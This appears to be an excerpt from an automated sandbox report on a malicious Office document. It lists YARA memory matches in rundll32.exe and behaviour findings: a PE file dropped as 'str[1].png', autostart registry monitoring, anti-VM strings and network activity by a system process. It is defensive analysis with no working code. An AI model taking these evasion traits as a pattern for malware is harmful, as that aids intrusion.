 Source: Yara match File source: 00000004.00000003.747626172.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747278419.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748655251.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747986077.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748565990.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747784344.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748768619.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748706961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748439771.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747923961.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747187809.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748882453.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747462773.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748866102.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.1090108573.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748524369.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748742031.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747541752.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748483745.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747705654.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748046989.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748608001.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747851363.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.754701787.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748794995.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747089322.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.747369834.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748817707.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748192310.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748306925.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748386504.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748126666.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748842412.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000003.748249184.0000000005F50000.00000004.00000040.sdmp, type: MEMORY Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6524, type: MEMORY
 Monitors certain registry keys / values for changes (often done to protect autostart functionality) Show sources
 Disables application error messsages (SetErrorMode) Show sources
 Found dropped PE file which has not been started or loaded Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\str[1].png Jump to dropped file
 May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory) Show sources
 Source: rundll32.exe, 00000004.00000003.825823906.0000000000DB1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW Source: wget.exe, 00000002.00000002.654002429.0000000000B78000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

### HIPS / PFW / Operating System Protection Evasion:

 System process connects to network (likely due to code injection or exploit) Show sources